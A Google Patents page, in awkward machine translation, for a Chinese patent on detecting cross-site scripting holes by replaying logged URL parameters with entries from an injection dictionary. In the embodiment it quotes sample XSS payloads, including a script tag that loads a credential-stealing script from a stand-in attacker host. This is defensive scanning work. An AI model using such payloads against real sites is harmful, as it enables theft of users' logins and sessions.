CN105049440B - Detect the method and system of cross-site scripting attack injection - Google Patents

Detect the method and system of cross-site scripting attack injection Download PDF

Info

Publication number
CN105049440B
CN105049440B CN201510476875.3A CN201510476875A CN105049440B CN 105049440 B CN105049440 B CN 105049440B CN 201510476875 A CN201510476875 A CN 201510476875A CN 105049440 B CN105049440 B CN 105049440B
Authority
CN
China
Prior art keywords
request
injection
module
parameter
attack
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Active
Application number
CN201510476875.3A
Other languages
Chinese (zh)
Other versions
CN105049440A (en
Inventor
陈丛亮
刘德建
毛新生
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Fujian TQ Digital Co Ltd
Original Assignee
Fujian TQ Digital Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Fujian TQ Digital Co Ltd filed Critical Fujian TQ Digital Co Ltd
Priority to CN201510476875.3A priority Critical patent/CN105049440B/en
Publication of CN105049440A publication Critical patent/CN105049440A/en
Application granted granted Critical
Publication of CN105049440B publication Critical patent/CN105049440B/en
Active legal-status Critical Current
Anticipated expiration legal-status Critical

Links

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441Countermeasures against malicious traffic
    • H04L63/1466Active attacks involving interception, injection, modification, spoofing of data unit addresses, e.g. hijacking, packet injection or TCP sequence number attacks
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1416Event detection, e.g. attack signature detection

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer And Data Communications (AREA)

Abstract

The invention discloses a kind of method and system for detecting cross-site scripting attack injection, wherein method includes:The Request Log that reverse proxy module record user accesses;Grouping and classifying is carried out to the Request Log, generates URL parameter, and preserve;The parameter name and parameter value in the URL parameter are detected respectively;The parameter value is replaced as corresponding content in script injection attacks dictionary list, the request of generation second;Send the second request and arrive destination server, and receive return respond request;Whether judge in the return respond request containing attack content;If so, then the URL parameter is included in injection risk list.By the above-mentioned means, the present invention can more comprehensively detect XSS leaks present in website, the risk of user under fire is reduced, improves site safety, and the URL that the mode for comparing reptile detects is more complete.

Description

Detect the method and system of cross-site scripting attack injection
Technical field
The present invention relates to a kind of method and system for detecting cross-site scripting attack injection.
Background technology
So-called cross-site scripting attack (Cross Site Scripting), for the CSS (Cascading that gets along well Style Sheets, CSS) abbreviation obscure, therefore cross-site scripting attack is abbreviated as XSS.Malicious attacker is inserted toward in Web page Enter malice html codes, when user browses the page, being embedded the html codes inside Web can be performed, so as to reach The specific purposes of malicious attack user.
XSS is a kind of computer security leak frequently appeared in web applications, and it allows malice web user by code It is implanted in the page for being supplied to other users to use.For example these codes include HTML code and client script.Attacker Access control is bypassed using XSS leaks --- such as origin policy (same origin policy).Such leak Become to be widely known by the people due to being used by a hacker to write the bigger phishing of harmfulness (Phishing) attack.For across station pin This attack, hacker's circle common recognition are:Cross-site scripting attack is new " buffer overflow attack ", and JavaScript is new “ShellCode”。
Current many websites are found the leak that cross-site script be present, are all much to website progress time using reptile Go through, so handle, request tracking can be caused not comprehensive enough, tested sufficiently complete.
Existing patent application (application number:201510046908.0) propose it is a kind of across station vulnerability scanning method and system, Methods described comprises the following steps:Link to the whole station or single-page of targeted sites crawls;To crawling obtained link Filtered with preparatory condition, it is multiple potential across station leak link to obtain;Using vector of attack to each described potential across station Leak link carries out fuzz testing;It is each described potential across station leak using being checked in browsing module during fuzz testing The webpage source code of link carries out dynamic analysis, to judge that potential linked across station leak whether there is across station leak;There will be Preserved across the vector of attack of link and the corresponding loading of station leak to database.The patent is to each potential using vector of attack Link carries out fuzz testing, and workload is big, requires high to hardware configuration.
The content of the invention
The technical problems to be solved by the invention are:By configuring reverse proxy module, and according to all solicited messages, carry Variable element is taken, injection test dictionary, cross-site scripting attack test is carried out, to obtain return value, and then realizes more comprehensive XSS leaks present in website are detected, the risk of user under fire is reduced, improves site safety, and compare the side of reptile The URL of formula detection is more complete.
In order to solve the above-mentioned technical problem, the technical solution adopted by the present invention is:A kind of detection cross-site scripting attack is provided The method of injection, including:
The Request Log that reverse proxy module record user accesses;
Grouping and classifying is carried out to the Request Log, generates URL parameter, and preserve;
The parameter name and parameter value in the URL parameter are detected respectively;
The parameter value is replaced as corresponding content in script injection attacks dictionary list, the request of generation second;
Send the second request and arrive destination server, and receive return respond request;
Whether judge in the return respond request containing attack content;
If so, then the URL parameter is included in injection risk list.
To solve the above problems, the present invention also provides a kind of system for detecting cross-site scripting attack injection, including:
Reverse proxy module, for recording the Request Log of user's access;
Classification preserving module, for carrying out grouping and classifying to the Request Log, URL parameter is generated, and preserve;
Detection module, for detecting parameter name and parameter value in the URL parameter;
Generation module is replaced, it is raw for replacing the parameter value as corresponding content in script injection attacks dictionary list Into the second request;
Sending/receiving module, destination server is arrived for sending the second request, and receive return respond request;
Judge module, for whether judging in the return respond request containing attack content;
List block, for the URL parameter to be included in injection risk list.
The beneficial effects of the present invention are:Prior art is different from, by configuring reverse proxy module, and ask the visitor according to institute Information is sought, variable element is extracted, injection test dictionary, carries out cross-site scripting attack test, to obtain return value, and then realize more Add XSS leaks present in comprehensive detection website, reduce the risk of user under fire, improve site safety, and compare The URL that the mode of reptile detects is more complete.
Brief description of the drawings
Fig. 1 is the schematic flow sheet of the inventive method embodiment one;
Fig. 2 is the schematic flow sheet of the inventive method embodiment two;
Fig. 3 is the structured flowchart of present system embodiment three;
Fig. 4 is the structured flowchart of present system example IV.
Embodiment
To describe the technology contents of the present invention, the objects and the effects in detail, below in conjunction with embodiment and coordinate attached Figure is explained.
The design of most critical of the present invention is:Analyzed, replacement processing, led to by injecting request to cross-site scripting attack The request of transmission second is crossed to judge respond request, realizes that detection cross-site scripting attack is injected into system.
Fig. 1 is refer to, the embodiment of the present invention one provides a kind of method for detecting cross-site scripting attack, comprised the following steps:
S1:The Request Log that reverse proxy module record user accesses;
S2:Grouping and classifying is carried out to the Request Log, generates URL parameter, and preserve;
S3:The parameter name and parameter value in the URL parameter are detected respectively;
S4:The parameter value is replaced as corresponding content in script injection attacks dictionary list, the request of generation second;
S5:Send the second request and arrive destination server, and receive return respond request;
S6:Whether judge in the return respond request containing attack content;
If so, then perform step S7:The URL parameter is included in injection risk list.
As shown in Fig. 2 on the basis of embodiment one, before the step S1 of the embodiment of the present invention two, in addition to:
S01:Configure reverse proxy module;
S02:Domain name is parsed to reverse proxy module.
Wherein, step S4 is specially:
S41:Parameter value is replaced with to corresponding content in script injection attacks dictionary list successively;
S42:After replacing successively, corresponding at least one second request of generation.
Wherein, after step S6, in addition to:
If it is not, then perform step S70:Ignore the return respond request.
In a specific embodiment, following prepare can be made in advance before being on the defensive:
Reverse proxy module is configured, for recording all Request Logs of user's access.And reverse proxy module can be Reverse Proxy, the application program containing journal function that can also be carried with system, such as iis, apache, nginx Deng proxy server is usually the client of user, and Reverse Proxy is used for service end.
The advantage of journal function of the configuration reverse proxy module with directly being carried using system is, without changing original clothes Business device configuration, need to only be configured in Reverse Proxy.
And upon configuration, translate domain names into the reverse proxy module.
In specific test process, user accesses Reverse Proxy, and Reverse Proxy can record user's visit The content of all requests of website is asked, is preserved as Request Log.Then, the URL of Request Log is entered by URL and its parameter Row grouping and classifying, generate the URL parameter of website.Specifically, can pass throughURL is split with &, such as:http://abc.com/id =1&name=abc.Its parameter name is id and name and corresponding parameter value is respectively 1 and abc;Wherein URL not containing parameters Part is http://abc.com/.
The parameter name in the URL of above-mentioned preservation is detected again with parameter value respectively by program, by parameter value 1 Corresponding content in conventional script injection attacks dictionary list is replaced with, the request after being replaced with generation, i.e., the second request.
Specifically, keyword can be passed throughURL is split with &, you can parameter value replacement is carried out by regular expression successively (form is:Parameter name=parameter).The corresponding content wherein attacked in dictionary list is exactly that common are possible inject Keyword or block, such as:<script></script>Tag block and, the keyword such as onclick, javascript.Should When understanding, because content is possible to more than one in attack dictionary list, therefore after replacement, at least one replace can be generated Request after changing.
Request after replacement is re-transmitted to destination server, and detects and returns in respond request with the presence or absence of in attack Hold.
Usually, detected website can be transmitted.HTTP request is sent to accessed detected website, is detected website A http response can be returned, whether then detects wherein content comprising the attack content in request.
If this URL parameter is included in and existed in XSS injection risk lists comprising attack content in detection request.
If not including attack content in detection request, directly ignore the return respond request.And send next second Ask in destination server, step S5~S7 is performed with circulation, the request after having detected all replacements, will be met the requirements URL parameter be included in and exist in XSS injection risk lists.
Concrete example is as follows:In http:In //abc.com/ websites, Get is have recorded in the daily record of reverse proxy http://abc.com/This request of id=1.By script injection attacks dictionary, (dictionary has contained many kinds can be with The use-case of injection, for testing one by one) parameter value 1 is substituted for attack string in dictionary (i.e. in list by regular expression Corresponding content).
Such as:http://abc.com/Id=<Script type='text/javascript'>alert('pwnd'); </script>;Or
<Script type='text/javascript'>alert('pwnd');</script>;Or
<Script%20src=" http://mallorysevilsite.com/authstealer.js">.
Such as this example replaces with $ 1 using regular expression (id=) [^ &] *<Script type='text/ javascript'>alert('pwnd');</script>
As a result it is http://abc.com/Id=<Script type='text/javascript'>alert(' pwnd');</script>] attack string.
Then detection returns in the content of response whether include this script, and is not by escape.Then illustrate this URL Injection risk be present.
In summary, the embodiment of the present invention records Request Log by reverse proxy module, and parses domain name, to daily record point After group is sorted out, URL parameter is generated, using the basis as defence and is prepared;Injection test dictionary is reused, XSS is carried out to parameter Injection test, whether return value therein is obtained containing attack content, is included in finally assert in injection risk list.Cause XSS injection loopholes present in website during this embodiment of the present invention two can be detected more comprehensively, reduce user under fire Risk, site safety is improved, and the URL that the mode for comparing reptile detects is more complete.
Hold, as shown in figure 3, the embodiment of the present invention three provides a kind of system 100 for detecting cross-site scripting attack, including:
Reverse proxy module 110, for recording the Request Log of user's access;
Classification preserving module 120, for carrying out grouping and classifying to the Request Log, URL parameter is generated, and preserve;
Detection module 130, for detecting parameter name and parameter value in the URL parameter;
Generation module 140 is replaced, for replacing the parameter value as corresponding content in script injection attacks dictionary list, The request of generation second;
Sending/receiving module 150, destination server 200 is arrived for sending the second request, and receive return respond request;
Judge module 160, for whether judging in the return respond request containing attack content;
List block 170, for the URL parameter to be included in into injection risk list.
Wherein, the system 100 of present example four, in addition to:
Configuration module 180, for configuring reverse proxy service module;
Parsing module 190, for parsing domain name to reverse proxy service module.
Wherein, replacing generation module 140 also includes:
Replacement unit 141, for parameter value to be replaced with to corresponding content in script injection attacks dictionary list successively;
Generation unit 142, for after replacing successively, corresponding generation second to be asked.
Wherein, after attack content is not contained during judge module 160 judges the return respond request, then described return is ignored Return respond request.
Embodiments of the invention are the foregoing is only, are not intended to limit the scope of the invention, it is every to utilize this hair The equivalents that bright specification and accompanying drawing content are made, or the technical field of correlation is directly or indirectly used in, similarly include In the scope of patent protection of the present invention.

Claims (6)

  1. A kind of 1. method for detecting cross-site scripting attack injection, it is characterised in that including:
    The Request Log that reverse proxy module record user accesses;
    Grouping and classifying is carried out to the Request Log, generates URL parameter, and preserve;
    The parameter name and parameter value in the URL parameter are detected respectively;
    The parameter value is replaced as corresponding content in script injection attacks dictionary list, the request of generation second;
    Send the second request and arrive destination server, and receive return respond request;
    Whether judge in the return respond request containing attack content;
    If so, then the URL parameter is included in injection risk list;
    Wherein, the step of it is corresponding content in script injection attacks dictionary list to replace the parameter value, and generation second is asked Specially:
    Parameter value is replaced with to corresponding content in script injection attacks dictionary list successively;
    After replacing successively, corresponding at least one second request of generation.
  2. 2. the method for cross-site scripting attack injection is detected according to claim 1, it is characterised in that reverse proxy service module Before the step of recording user access request daily record, in addition to:
    Configure reverse proxy module;
    Domain name is parsed to reverse proxy module.
  3. 3. the method for cross-site scripting attack injection is detected according to claim 1, it is characterised in that judge that described return responds After the step of whether containing attack content in request, in addition to:
    If it is not, then ignore the return respond request.
  4. A kind of 4. system for detecting cross-site scripting attack injection, it is characterised in that including:
    Reverse proxy module, for recording the Request Log of user's access;
    Classification preserving module, for carrying out grouping and classifying to the Request Log, URL parameter is generated, and preserve;
    Detection module, for detecting parameter name and parameter value in the URL parameter;
    Generation module is replaced, for replacing the parameter value as corresponding content in script injection attacks dictionary list, generation the Two requests;
    Sending/receiving module, destination server is arrived for sending the second request, and receive return respond request;
    Judge module, for whether judging in the return respond request containing attack content;
    List block, for the URL parameter to be included in injection risk list.
  5. 5. the system of cross-site scripting attack injection is detected according to claim 4, it is characterised in that also include:
    Configuration module, for configuring reverse proxy service module;
    Parsing module, for parsing domain name to reverse proxy service module.
  6. 6. the system of cross-site scripting attack injection is detected according to claim 4, it is characterised in that judge institute in judge module State after attack content is not contained in return respond request, then ignore the return respond request.
CN201510476875.3A 2015-08-06 2015-08-06 Detect the method and system of cross-site scripting attack injection Active CN105049440B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201510476875.3A CN105049440B (en) 2015-08-06 2015-08-06 Detect the method and system of cross-site scripting attack injection

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201510476875.3A CN105049440B (en) 2015-08-06 2015-08-06 Detect the method and system of cross-site scripting attack injection

Publications (2)

Publication Number Publication Date
CN105049440A CN105049440A (en) 2015-11-11
CN105049440B true CN105049440B (en) 2018-04-10

Family

ID=54455651

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201510476875.3A Active CN105049440B (en) 2015-08-06 2015-08-06 Detect the method and system of cross-site scripting attack injection

Country Status (1)

Country Link
CN (1) CN105049440B (en)

Families Citing this family (10)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN107948120B (en) * 2016-10-12 2020-11-24 阿里巴巴集团控股有限公司 Vulnerability detection method and device
CN106446694A (en) * 2016-12-13 2017-02-22 四川长虹电器股份有限公司 Xss vulnerability mining system based on network crawlers
CN108632219B (en) * 2017-03-21 2021-04-27 腾讯科技(深圳)有限公司 Website vulnerability detection method, detection server, system and storage medium
CN108667770B (en) * 2017-03-29 2020-12-18 腾讯科技(深圳)有限公司 Website vulnerability testing method, server and system
CN109040054B (en) * 2018-07-30 2020-12-04 杭州迪普科技股份有限公司 URL filtering test method and device
CN111104675A (en) * 2019-11-15 2020-05-05 泰康保险集团股份有限公司 Method and device for detecting system security vulnerability
CN113364815B (en) * 2021-08-11 2021-11-23 飞狐信息技术(天津)有限公司 Cross-site scripting vulnerability attack defense method and device
CN113965363B (en) * 2021-10-11 2023-07-14 北京天融信网络安全技术有限公司 Vulnerability research and judgment method and device based on Web user behaviors
CN114205123A (en) * 2021-11-20 2022-03-18 湖北天融信网络安全技术有限公司 Attack and defense confrontation-based threat hunting method, device, equipment and storage medium
CN114816558B (en) * 2022-03-07 2023-06-30 深圳市九州安域科技有限公司 Script injection method, equipment and computer readable storage medium

Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN102880830A (en) * 2011-07-15 2013-01-16 华为软件技术有限公司 Acquisition method and device of original test data
CN102999420A (en) * 2011-09-13 2013-03-27 阿里巴巴集团控股有限公司 XSS (Cross Site Scripting) testing method and XSS testing system based on DOM (Document Object Model)
CN103023869A (en) * 2012-11-02 2013-04-03 北京奇虎科技有限公司 Malicious attack prevention method and browser

Family Cites Families (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN103067344B (en) * 2011-10-24 2016-03-30 国际商业机器公司 The noninvasive method of automatic distributing safety regulation and equipment in cloud environment

Patent Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN102880830A (en) * 2011-07-15 2013-01-16 华为软件技术有限公司 Acquisition method and device of original test data
CN102999420A (en) * 2011-09-13 2013-03-27 阿里巴巴集团控股有限公司 XSS (Cross Site Scripting) testing method and XSS testing system based on DOM (Document Object Model)
CN103023869A (en) * 2012-11-02 2013-04-03 北京奇虎科技有限公司 Malicious attack prevention method and browser

Also Published As

Publication number Publication date
CN105049440A (en) 2015-11-11

Similar Documents

Publication Publication Date Title
CN105049440B (en) Detect the method and system of cross-site scripting attack injection
Kirda et al. Client-side cross-site scripting protection
US9398031B1 (en) Malicious advertisement detection and remediation
Likarish et al. Obfuscated malicious javascript detection using classification techniques
US9268937B1 (en) Mitigating malware
US8347392B2 (en) Apparatus and method for analyzing and supplementing a program to provide security
US8555391B1 (en) Adaptive scanning
US8683584B1 (en) Risk assessment
US8949990B1 (en) Script-based XSS vulnerability detection
US20140173736A1 (en) Method and system for detecting webpage Trojan embedded
WO2017056121A1 (en) Method for the identification and prevention of client-side web attacks
Fraiwan et al. Analysis and identification of malicious javascript code
CN103617390A (en) Malicious webpage judgment method, device and system
Rao et al. Two for the price of one: A combined browser defense against XSS and clickjacking
Zhang et al. Detecting malicious activities with user‐agent‐based profiles
Choi et al. HXD: Hybrid XSS detection by using a headless browser
US9923916B1 (en) Adaptive web application vulnerability scanner
Samarasinghe et al. On cloaking behaviors of malicious websites
Canfora et al. A set of features to detect web security threats
Kishore et al. Browser JS Guard: Detects and defends against Malicious JavaScript injection based drive by download attacks
CN105072109B (en) Prevent the method and system of cross-site scripting attack
Maurya Positive security model based server-side solution for prevention of cross-site scripting attacks
Krishnaveni et al. Multiclass classification of XSS web page attack using machine learning techniques
Das et al. Detection of cross-site scripting attack under multiple scenarios
Barhoom et al. A new server-side solution for detecting cross site scripting attack

Legal Events

Date Code Title Description
C06 Publication
PB01 Publication
C10 Entry into substantive examination
SE01 Entry into force of request for substantive examination
GR01 Patent grant
GR01 Patent grant